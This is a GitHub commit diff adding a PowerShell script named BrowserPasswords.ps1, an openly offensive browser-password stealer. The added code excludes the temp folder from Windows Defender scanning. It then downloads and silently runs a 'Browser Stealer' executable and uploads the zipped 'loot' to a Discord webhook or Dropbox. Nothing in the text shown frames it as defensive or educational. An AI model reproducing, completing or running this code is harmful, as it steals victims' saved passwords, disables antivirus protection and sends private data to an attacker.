Update BrowserPasswords.ps1
This commit is contained in:
I-Am-Jakoby
GitHub
parent
1c6b3d6867
commit
a7489f5730
1 changed files with 62 additions and 0 deletions
|
|
@ -1 +1,63 @@
|
|||
function DropBox-Upload {
|
||||
|
||||
[CmdletBinding()]
|
||||
param (
|
||||
|
||||
[Parameter (Mandatory = $True, ValueFromPipeline = $True)]
|
||||
[Alias("f")]
|
||||
[string]$SourceFilePath
|
||||
)
|
||||
$outputFile = Split-Path $SourceFilePath -leaf
|
||||
$TargetFilePath="/$outputFile"
|
||||
$arg = '{ "path": "' + $TargetFilePath + '", "mode": "add", "autorename": true, "mute": false }'
|
||||
$authorization = "Bearer " + $db
|
||||
$headers = New-Object "System.Collections.Generic.Dictionary[[String],[String]]"
|
||||
$headers.Add("Authorization", $authorization)
|
||||
$headers.Add("Dropbox-API-Arg", $arg)
|
||||
$headers.Add("Content-Type", 'application/octet-stream')
|
||||
Invoke-RestMethod -Uri https://content.dropboxapi.com/2/files/upload -Method Post -InFile $SourceFilePath -Headers $headers
|
||||
}
|
||||
|
||||
if (-not ([string]::IsNullOrEmpty($db))){DropBox-Upload -f $env:TMP\$FileName}
|
||||
|
||||
#------------------------------------------------------------------------------------------------------------------------------------
|
||||
|
||||
function Upload-Discord {
|
||||
|
||||
[CmdletBinding()]
|
||||
param (
|
||||
[parameter(Position=0,Mandatory=$False)]
|
||||
[string]$file,
|
||||
[parameter(Position=1,Mandatory=$False)]
|
||||
[string]$text
|
||||
)
|
||||
|
||||
$hookurl = "$dc"
|
||||
|
||||
$Body = @{
|
||||
'username' = $env:username
|
||||
'content' = $text
|
||||
}
|
||||
|
||||
if (-not ([string]::IsNullOrEmpty($text))){
|
||||
Invoke-RestMethod -ContentType 'Application/Json' -Uri $hookurl -Method Post -Body ($Body | ConvertTo-Json)};
|
||||
|
||||
if (-not ([string]::IsNullOrEmpty($file))){curl.exe -F "file1=@$file" $hookurl}
|
||||
}
|
||||
|
||||
if (-not ([string]::IsNullOrEmpty($dc))){Upload-Discord -file $env:TMP\$FileName}
|
||||
|
||||
|
||||
|
||||
# Add C:/ to exlusions so Windows Defender doesnt flag the exe we will download
|
||||
Add-MpPreference -ExclusionPath $env:tmp
|
||||
|
||||
# Download the exe and save it to temp directory
|
||||
iwr "COMING SOON" -outfile "$env:tmp\browser.exe"
|
||||
|
||||
# Execute the Browser Stealer
|
||||
cd $env:tmp;Start-Process -FilePath "$env:tmp\browser.exe" -WindowStyle h -Wait
|
||||
|
||||
# Exfiltrate the loot to discord
|
||||
Compress-Archive -Path "$env:tmp\results" -DestinationPath $env:tmp\browserdata.zip
|
||||
Upload-Discord -file "$env:tmp\browserdata.zip"
|
||||
|
|
|
|||
Loading…
Reference in a new issue